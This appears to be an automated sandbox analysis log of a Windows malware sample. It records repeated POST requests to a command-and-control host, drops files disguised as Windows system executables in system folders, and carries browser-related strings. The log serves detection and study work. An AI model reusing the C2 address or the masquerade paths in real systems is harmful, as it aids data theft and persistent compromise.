Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----p3V6slVJ7hXe8d39XCGX37f04oKmGxfeiFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3182Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1980Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----08Dfp8jjadpVplryN3AuPdkfPQTJuY9T9PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3006Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2004Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 540Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1972Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----kcbsKZtc9dYlo99APjhhMTDtwWHit2hzwfUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 3014Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 1984Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 2584Expect: 100-continue
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: 863811cm.nyafka.top
Source: unknown HTTP traffic detected: POST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 863811cm.nyafka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://863811cm.nyafka.top
Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://863811cm.nyafka.top/
Source: StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003808000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003ADE000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000038AE000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003904000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.0000000003CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
Source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000029.00000002.3272135764.00000000035B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PElAqcNNWD.41.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PElAqcNNWD.41.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PElAqcNNWD.41.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PElAqcNNWD.41.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PElAqcNNWD.41.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PElAqcNNWD.41.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PElAqcNNWD.41.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PElAqcNNWD.41.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: PElAqcNNWD.41.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\assembly\GAC_32\System.Data.OracleClient\55b276f4edf653 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\bcastdvr\apERZQztEJsqymITPFxguVe.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\bcastdvr\7b23a8b4123990 Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe File created: C:\Windows\Branding\shellbrd\7b23a8b4123990 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: c:\Windows\System32\SecurityHealthSystray.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File deleted: C:\Windows\System32\CSCCFFE6734440C4D2883932D483985654.TMP Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF848F20D4C 0_2_00007FF848F20D4C
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF848F20E43 0_2_00007FF848F20E43
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF84969AD5F 0_2_00007FF84969AD5F
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 7_2_00007FF848F40D4C 7_2_00007FF848F40D4C
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 7_2_00007FF848F40E43 7_2_00007FF848F40E43
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F30EF0 9_2_00007FF848F30EF0
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F304FA 9_2_00007FF848F304FA
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F303FA 9_2_00007FF848F303FA
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F30000 9_2_00007FF848F30000
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F300D3 9_2_00007FF848F300D3
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F20D4C 9_2_00007FF848F20D4C
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F20E43 9_2_00007FF848F20E43
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F516E1 9_2_00007FF848F516E1
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F5D42A 9_2_00007FF848F5D42A
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F716E1 32_2_00007FF848F716E1
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F7D42A 32_2_00007FF848F7D42A
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F50EF0 32_2_00007FF848F50EF0
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F504FA 32_2_00007FF848F504FA
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F503FA 32_2_00007FF848F503FA
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F50000 32_2_00007FF848F50000
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F500D3 32_2_00007FF848F500D3
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F40D4C 32_2_00007FF848F40D4C
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F40E43 32_2_00007FF848F40E43
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 33_2_00007FF848F10D4C 33_2_00007FF848F10D4C
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 33_2_00007FF848F10E43 33_2_00007FF848F10E43
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F616E1 34_2_00007FF848F616E1
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F6D42A 34_2_00007FF848F6D42A
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F404FA 34_2_00007FF848F404FA
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F403FA 34_2_00007FF848F403FA
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F40000 34_2_00007FF848F40000
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F400D3 34_2_00007FF848F400D3
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F30D4C 34_2_00007FF848F30D4C
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F30E43 34_2_00007FF848F30E43
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 35_2_00007FF848F30D4C 35_2_00007FF848F30D4C
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 35_2_00007FF848F30E43 35_2_00007FF848F30E43
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F304FA 36_2_00007FF848F304FA
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F303FA 36_2_00007FF848F303FA
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F30000 36_2_00007FF848F30000
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F300D3 36_2_00007FF848F300D3
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F516E1 36_2_00007FF848F516E1
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F5D42A 36_2_00007FF848F5D42A
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F20D4C 36_2_00007FF848F20D4C
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F20E43 36_2_00007FF848F20E43
